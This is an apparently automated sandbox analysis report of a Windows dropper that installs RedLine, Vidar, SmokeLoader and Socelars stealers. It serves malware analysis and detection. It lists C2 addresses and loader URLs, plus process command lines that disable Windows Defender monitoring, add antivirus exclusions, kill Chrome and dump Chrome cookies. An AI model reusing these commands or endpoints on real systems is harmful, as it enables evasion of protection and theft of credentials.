Analysis
-
max time kernel
67s -
max time network
177s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
23/12/2021, 13:28
Static task
static1
Behavioral task
behavioral1
Sample
3fa8be5f12b636409efb929e15fff3a2bd9a6f35cdbce30c8d6ad46b612cccb8.exe
Resource
win7-en-20211208
General
-
Target
3fa8be5f12b636409efb929e15fff3a2bd9a6f35cdbce30c8d6ad46b612cccb8.exe
-
Size
7.1MB
-
MD5
3a48bfd136709a9083047a674a69f1f9
-
SHA1
f21601d486c7127b24329c9387941aa163574c0f
-
SHA256
3fa8be5f12b636409efb929e15fff3a2bd9a6f35cdbce30c8d6ad46b612cccb8
-
SHA512
e237d9cc909a4530a873eaf47d68fccc11b100997cdcad07197a9d9848248759e5996b4f83780efac439164942a72355b6a5b60388e38f1885ce7a0b11643239
Malware Config
Extracted
socelars
http://www.biohazardgraphics.com/
Extracted
vidar
49.2
915
https://mstdn.social/@kipriauk9
https://qoto.org/@kipriauk8
-
profile_id
915
Extracted
smokeloader
2020
http://rcacademy.at/upload/
http://e-lanpengeonline.com/upload/
http://vjcmvz.cn/upload/
http://galala.ru/upload/
http://witra.ru/upload/
Extracted
redline
media22ns
65.108.69.168:13293
Extracted
redline
v3user1
159.69.246.184:13127
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4692 4576 rundll32.exe 121 -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 8 IoCs
resource yara_rule behavioral2/memory/4588-312-0x0000000000419336-mapping.dmp family_redline behavioral2/memory/4588-310-0x0000000000400000-0x0000000000420000-memory.dmp family_redline behavioral2/memory/4604-311-0x0000000000400000-0x0000000000420000-memory.dmp family_redline behavioral2/memory/4604-313-0x0000000000419336-mapping.dmp family_redline behavioral2/memory/4588-317-0x0000000000400000-0x0000000000420000-memory.dmp family_redline behavioral2/memory/4588-319-0x0000000000400000-0x0000000000420000-memory.dmp family_redline behavioral2/memory/4604-318-0x0000000000400000-0x0000000000420000-memory.dmp family_redline behavioral2/memory/4604-316-0x0000000000400000-0x0000000000420000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 2 IoCs
resource yara_rule behavioral2/files/0x000500000001ab1f-180.dat family_socelars behavioral2/files/0x000500000001ab1f-152.dat family_socelars -
suricata: ET MALWARE GCleaner Downloader Activity M5
suricata: ET MALWARE GCleaner Downloader Activity M5
-
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
-
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
-
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
-
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
-
NirSoft WebBrowserPassView 3 IoCs
Password recovery tool for various web browsers
resource yara_rule behavioral2/files/0x000500000001ab27-207.dat WebBrowserPassView behavioral2/files/0x000500000001ab27-164.dat WebBrowserPassView behavioral2/memory/2340-366-0x0000000000400000-0x000000000047C000-memory.dmp WebBrowserPassView -
Nirsoft 4 IoCs
resource yara_rule behavioral2/files/0x000500000001ab27-207.dat Nirsoft behavioral2/files/0x000500000001ab27-164.dat Nirsoft behavioral2/memory/4928-328-0x0000000000400000-0x0000000000455000-memory.dmp Nirsoft behavioral2/memory/2340-366-0x0000000000400000-0x000000000047C000-memory.dmp Nirsoft -
Vidar Stealer 2 IoCs
resource yara_rule behavioral2/memory/2128-248-0x0000000000E70000-0x0000000000F45000-memory.dmp family_vidar behavioral2/memory/2128-249-0x0000000000400000-0x00000000008B2000-memory.dmp family_vidar -
resource yara_rule behavioral2/files/0x000600000001ab12-125.dat aspack_v212_v242 behavioral2/files/0x000600000001ab12-127.dat aspack_v212_v242 behavioral2/files/0x000500000001ab10-126.dat aspack_v212_v242 behavioral2/files/0x000500000001ab10-132.dat aspack_v212_v242 behavioral2/files/0x000500000001ab10-131.dat aspack_v212_v242 behavioral2/files/0x000600000001ab14-130.dat aspack_v212_v242 behavioral2/files/0x000600000001ab14-133.dat aspack_v212_v242 -
Downloads MZ/PE file
-
Executes dropped EXE 20 IoCs
pid Process 836 setup_installer.exe 3392 setup_install.exe 2128 Thu00da98426c.exe 2092 Thu00b8fd4ecc01704f.exe 3952 Thu0077887e5daa8.exe 2336 Thu00a73c6023a843a.exe 3084 Thu00cb65ad73a02.exe 3708 Thu006ed6d1f277becf2.exe 1724 Thu002ed3939609a.exe 1876 Thu00d08a9d76e3.exe 848 Thu004af3e2f6505725.exe 2340 11111.exe 1356 Thu00d721da438.exe 3632 Thu00516cc538bf9ef.exe 3276 Thu00cb65ad73a02.exe 3872 Thu0085233abe88018.exe 3164 Thu00a0763418baa.exe 752 msiexec.exe 2288 Thu008eaab40b8d4438f.exe 2096 Thu004af3e2f6505725.tmp -
Loads dropped DLL 8 IoCs
pid Process 3392 setup_install.exe 3392 setup_install.exe 3392 setup_install.exe 3392 setup_install.exe 3392 setup_install.exe 3392 setup_install.exe 3392 setup_install.exe 3392 setup_install.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 13 ip-api.com -
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
-
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 3084 set thread context of 3276 3084 Thu00cb65ad73a02.exe 96 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Kills process with taskkill 2 IoCs
pid Process 4780 taskkill.exe 4772 taskkill.exe -
Suspicious use of AdjustPrivilegeToken 36 IoCs
description pid Process Token: SeCreateTokenPrivilege 3952 Thu0077887e5daa8.exe Token: SeAssignPrimaryTokenPrivilege 3952 Thu0077887e5daa8.exe Token: SeLockMemoryPrivilege 3952 Thu0077887e5daa8.exe Token: SeIncreaseQuotaPrivilege 3952 Thu0077887e5daa8.exe Token: SeMachineAccountPrivilege 3952 Thu0077887e5daa8.exe Token: SeTcbPrivilege 3952 Thu0077887e5daa8.exe Token: SeSecurityPrivilege 3952 Thu0077887e5daa8.exe Token: SeTakeOwnershipPrivilege 3952 Thu0077887e5daa8.exe Token: SeLoadDriverPrivilege 3952 Thu0077887e5daa8.exe Token: SeSystemProfilePrivilege 3952 Thu0077887e5daa8.exe Token: SeSystemtimePrivilege 3952 Thu0077887e5daa8.exe Token: SeProfSingleProcessPrivilege 3952 Thu0077887e5daa8.exe Token: SeIncBasePriorityPrivilege 3952 Thu0077887e5daa8.exe Token: SeCreatePagefilePrivilege 3952 Thu0077887e5daa8.exe Token: SeCreatePermanentPrivilege 3952 Thu0077887e5daa8.exe Token: SeBackupPrivilege 3952 Thu0077887e5daa8.exe Token: SeRestorePrivilege 3952 Thu0077887e5daa8.exe Token: SeShutdownPrivilege 3952 Thu0077887e5daa8.exe Token: SeDebugPrivilege 3952 Thu0077887e5daa8.exe Token: SeAuditPrivilege 3952 Thu0077887e5daa8.exe Token: SeSystemEnvironmentPrivilege 3952 Thu0077887e5daa8.exe Token: SeChangeNotifyPrivilege 3952 Thu0077887e5daa8.exe Token: SeRemoteShutdownPrivilege 3952 Thu0077887e5daa8.exe Token: SeUndockPrivilege 3952 Thu0077887e5daa8.exe Token: SeSyncAgentPrivilege 3952 Thu0077887e5daa8.exe Token: SeEnableDelegationPrivilege 3952 Thu0077887e5daa8.exe Token: SeManageVolumePrivilege 3952 Thu0077887e5daa8.exe Token: SeImpersonatePrivilege 3952 Thu0077887e5daa8.exe Token: SeCreateGlobalPrivilege 3952 Thu0077887e5daa8.exe Token: 31 3952 Thu0077887e5daa8.exe Token: 32 3952 Thu0077887e5daa8.exe Token: 33 3952 Thu0077887e5daa8.exe Token: 34 3952 Thu0077887e5daa8.exe Token: 35 3952 Thu0077887e5daa8.exe Token: SeDebugPrivilege 3632 Thu00516cc538bf9ef.exe Token: SeDebugPrivilege 3164 Thu00a0763418baa.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 664 wrote to memory of 836 664 3fa8be5f12b636409efb929e15fff3a2bd9a6f35cdbce30c8d6ad46b612cccb8.exe 69 PID 664 wrote to memory of 836 664 3fa8be5f12b636409efb929e15fff3a2bd9a6f35cdbce30c8d6ad46b612cccb8.exe 69 PID 664 wrote to memory of 836 664 3fa8be5f12b636409efb929e15fff3a2bd9a6f35cdbce30c8d6ad46b612cccb8.exe 69 PID 836 wrote to memory of 3392 836 setup_installer.exe 70 PID 836 wrote to memory of 3392 836 setup_installer.exe 70 PID 836 wrote to memory of 3392 836 setup_installer.exe 70 PID 3392 wrote to memory of 3116 3392 setup_install.exe 73 PID 3392 wrote to memory of 3116 3392 setup_install.exe 73 PID 3392 wrote to memory of 3116 3392 setup_install.exe 73 PID 3392 wrote to memory of 3092 3392 setup_install.exe 74 PID 3392 wrote to memory of 3092 3392 setup_install.exe 74 PID 3392 wrote to memory of 3092 3392 setup_install.exe 74 PID 3392 wrote to memory of 2312 3392 setup_install.exe 75 PID 3392 wrote to memory of 2312 3392 setup_install.exe 75 PID 3392 wrote to memory of 2312 3392 setup_install.exe 75 PID 3392 wrote to memory of 1220 3392 setup_install.exe 76 PID 3392 wrote to memory of 1220 3392 setup_install.exe 76 PID 3392 wrote to memory of 1220 3392 setup_install.exe 76 PID 3392 wrote to memory of 1168 3392 setup_install.exe 77 PID 3392 wrote to memory of 1168 3392 setup_install.exe 77 PID 3392 wrote to memory of 1168 3392 setup_install.exe 77 PID 3392 wrote to memory of 3684 3392 setup_install.exe 111 PID 3392 wrote to memory of 3684 3392 setup_install.exe 111 PID 3392 wrote to memory of 3684 3392 setup_install.exe 111 PID 3392 wrote to memory of 2568 3392 setup_install.exe 110 PID 3392 wrote to memory of 2568 3392 setup_install.exe 110 PID 3392 wrote to memory of 2568 3392 setup_install.exe 110 PID 3392 wrote to memory of 1984 3392 setup_install.exe 109 PID 3392 wrote to memory of 1984 3392 setup_install.exe 109 PID 3392 wrote to memory of 1984 3392 setup_install.exe 109 PID 3392 wrote to memory of 1668 3392 setup_install.exe 78 PID 3392 wrote to memory of 1668 3392 setup_install.exe 78 PID 3392 wrote to memory of 1668 3392 setup_install.exe 78 PID 3392 wrote to memory of 1320 3392 setup_install.exe 108 PID 3392 wrote to memory of 1320 3392 setup_install.exe 108 PID 3392 wrote to memory of 1320 3392 setup_install.exe 108 PID 3392 wrote to memory of 1888 3392 setup_install.exe 79 PID 3392 wrote to memory of 1888 3392 setup_install.exe 79 PID 3392 wrote to memory of 1888 3392 setup_install.exe 79 PID 3392 wrote to memory of 2216 3392 setup_install.exe 81 PID 3392 wrote to memory of 2216 3392 setup_install.exe 81 PID 3392 wrote to memory of 2216 3392 setup_install.exe 81 PID 3392 wrote to memory of 1680 3392 setup_install.exe 82 PID 3392 wrote to memory of 1680 3392 setup_install.exe 82 PID 3392 wrote to memory of 1680 3392 setup_install.exe 82 PID 2568 wrote to memory of 2128 2568 cmd.exe 80 PID 2568 wrote to memory of 2128 2568 cmd.exe 80 PID 2568 wrote to memory of 2128 2568 cmd.exe 80 PID 1168 wrote to memory of 2092 1168 cmd.exe 107 PID 1168 wrote to memory of 2092 1168 cmd.exe 107 PID 1168 wrote to memory of 2092 1168 cmd.exe 107 PID 2312 wrote to memory of 3952 2312 cmd.exe 83 PID 2312 wrote to memory of 3952 2312 cmd.exe 83 PID 2312 wrote to memory of 3952 2312 cmd.exe 83 PID 3684 wrote to memory of 2336 3684 cmd.exe 106 PID 3684 wrote to memory of 2336 3684 cmd.exe 106 PID 3684 wrote to memory of 2336 3684 cmd.exe 106 PID 3392 wrote to memory of 2320 3392 setup_install.exe 85 PID 3392 wrote to memory of 2320 3392 setup_install.exe 85 PID 3392 wrote to memory of 2320 3392 setup_install.exe 85 PID 1320 wrote to memory of 3084 1320 cmd.exe 84 PID 1320 wrote to memory of 3084 1320 cmd.exe 84 PID 1320 wrote to memory of 3084 1320 cmd.exe 84 PID 3392 wrote to memory of 2268 3392 setup_install.exe 105
Processes
-
C:\Users\Admin\AppData\Local\Temp\3fa8be5f12b636409efb929e15fff3a2bd9a6f35cdbce30c8d6ad46b612cccb8.exe"C:\Users\Admin\AppData\Local\Temp\3fa8be5f12b636409efb929e15fff3a2bd9a6f35cdbce30c8d6ad46b612cccb8.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:664 -
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:836 -
C:\Users\Admin\AppData\Local\Temp\7zS4432B086\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS4432B086\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3392 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable4⤵PID:3116
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable5⤵PID:1544
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵PID:3092
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵PID:3984
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu0077887e5daa8.exe4⤵
- Suspicious use of WriteProcessMemory
PID:2312 -
C:\Users\Admin\AppData\Local\Temp\7zS4432B086\Thu0077887e5daa8.exeThu0077887e5daa8.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3952 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe6⤵PID:4472
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe7⤵
- Kills process with taskkill
PID:4780
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu00d08a9d76e3.exe4⤵PID:1220
-
C:\Users\Admin\AppData\Local\Temp\7zS4432B086\Thu00d08a9d76e3.exeThu00d08a9d76e3.exe5⤵
- Executes dropped EXE
PID:1876 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\System32\msiexec.exe" -Y .\5vk3Dqn.9sa6⤵PID:4124
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu00b8fd4ecc01704f.exe4⤵
- Suspicious use of WriteProcessMemory
PID:1168 -
C:\Users\Admin\AppData\Local\Temp\7zS4432B086\Thu00b8fd4ecc01704f.exeThu00b8fd4ecc01704f.exe5⤵
- Executes dropped EXE
PID:2092 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\System32\msiexec.exe" -Y .\5vk3Dqn.9sa6⤵
- Executes dropped EXE
PID:752
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu00d721da438.exe4⤵PID:1668
-
C:\Users\Admin\AppData\Local\Temp\7zS4432B086\Thu00d721da438.exeThu00d721da438.exe5⤵
- Executes dropped EXE
PID:1356 -
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt6⤵PID:4928
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /stab C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt6⤵
- Executes dropped EXE
PID:2340
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu004af3e2f6505725.exe4⤵PID:1888
-
C:\Users\Admin\AppData\Local\Temp\7zS4432B086\Thu004af3e2f6505725.exeThu004af3e2f6505725.exe5⤵
- Executes dropped EXE
PID:848
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu002ed3939609a.exe4⤵PID:2216
-
C:\Users\Admin\AppData\Local\Temp\7zS4432B086\Thu002ed3939609a.exeThu002ed3939609a.exe5⤵
- Executes dropped EXE
PID:1724
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu006ed6d1f277becf2.exe4⤵PID:1680
-
C:\Users\Admin\AppData\Local\Temp\7zS4432B086\Thu006ed6d1f277becf2.exeThu006ed6d1f277becf2.exe5⤵
- Executes dropped EXE
PID:3708
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu0085233abe88018.exe4⤵PID:2320
-
C:\Users\Admin\AppData\Local\Temp\7zS4432B086\Thu0085233abe88018.exeThu0085233abe88018.exe5⤵
- Executes dropped EXE
PID:3872 -
C:\Users\Admin\AppData\Local\Temp\7zS4432B086\Thu0085233abe88018.exeC:\Users\Admin\AppData\Local\Temp\7zS4432B086\Thu0085233abe88018.exe6⤵PID:4604
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu008eaab40b8d4438f.exe4⤵PID:3800
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu00a0763418baa.exe4⤵PID:1536
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu00516cc538bf9ef.exe4⤵PID:2268
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu00cb65ad73a02.exe /mixtwo4⤵
- Suspicious use of WriteProcessMemory
PID:1320
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu0059e5559dc713.exe4⤵PID:1984
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu00da98426c.exe4⤵
- Suspicious use of WriteProcessMemory
PID:2568
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu00a73c6023a843a.exe4⤵
- Suspicious use of WriteProcessMemory
PID:3684
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zS4432B086\Thu00da98426c.exeThu00da98426c.exe1⤵
- Executes dropped EXE
PID:2128
-
C:\Users\Admin\AppData\Local\Temp\7zS4432B086\Thu00cb65ad73a02.exeThu00cb65ad73a02.exe /mixtwo1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3084 -
C:\Users\Admin\AppData\Local\Temp\7zS4432B086\Thu00cb65ad73a02.exeThu00cb65ad73a02.exe /mixtwo2⤵
- Executes dropped EXE
PID:3276 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "Thu00cb65ad73a02.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS4432B086\Thu00cb65ad73a02.exe" & exit3⤵PID:4460
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "Thu00cb65ad73a02.exe" /f4⤵
- Kills process with taskkill
PID:4772
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zS4432B086\Thu0059e5559dc713.exeThu0059e5559dc713.exe1⤵PID:2340
-
C:\Users\Admin\AppData\Local\Temp\7zS4432B086\Thu008eaab40b8d4438f.exeThu008eaab40b8d4438f.exe1⤵PID:752
-
C:\Users\Admin\AppData\Local\Temp\7zS4432B086\Thu008eaab40b8d4438f.exe"C:\Users\Admin\AppData\Local\Temp\7zS4432B086\Thu008eaab40b8d4438f.exe" -u2⤵
- Executes dropped EXE
PID:2288
-
-
C:\Users\Admin\AppData\Local\Temp\7zS4432B086\Thu00a0763418baa.exeThu00a0763418baa.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3164
-
C:\Users\Admin\AppData\Local\Temp\is-GJ4JN.tmp\Thu004af3e2f6505725.tmp"C:\Users\Admin\AppData\Local\Temp\is-GJ4JN.tmp\Thu004af3e2f6505725.tmp" /SL5="$70062,870426,780800,C:\Users\Admin\AppData\Local\Temp\7zS4432B086\Thu004af3e2f6505725.exe"1⤵
- Executes dropped EXE
PID:2096 -
C:\Users\Admin\AppData\Local\Temp\7zS4432B086\Thu004af3e2f6505725.exe"C:\Users\Admin\AppData\Local\Temp\7zS4432B086\Thu004af3e2f6505725.exe" /SILENT2⤵PID:3208
-
C:\Users\Admin\AppData\Local\Temp\is-8VHP4.tmp\Thu004af3e2f6505725.tmp"C:\Users\Admin\AppData\Local\Temp\is-8VHP4.tmp\Thu004af3e2f6505725.tmp" /SL5="$50084,870426,780800,C:\Users\Admin\AppData\Local\Temp\7zS4432B086\Thu004af3e2f6505725.exe" /SILENT3⤵PID:4116
-
C:\Users\Admin\AppData\Local\Temp\is-OFH8C.tmp\windllhost.exe"C:\Users\Admin\AppData\Local\Temp\is-OFH8C.tmp\windllhost.exe" 774⤵PID:4860
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zS4432B086\Thu00516cc538bf9ef.exeThu00516cc538bf9ef.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3632
-
C:\Users\Admin\AppData\Local\Temp\7zS4432B086\Thu00a73c6023a843a.exeThu00a73c6023a843a.exe1⤵
- Executes dropped EXE
PID:2336 -
C:\Users\Admin\AppData\Local\Temp\7zS4432B086\Thu00a73c6023a843a.exeC:\Users\Admin\AppData\Local\Temp\7zS4432B086\Thu00a73c6023a843a.exe2⤵PID:4588
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:4692 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:4724
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵PID:2572
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x0 /state0:0xa3ad3055 /state1:0x41c64e6d1⤵PID:4316
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵PID:3508
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵PID:4956
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵PID:4888
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵PID:4776
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵PID:4520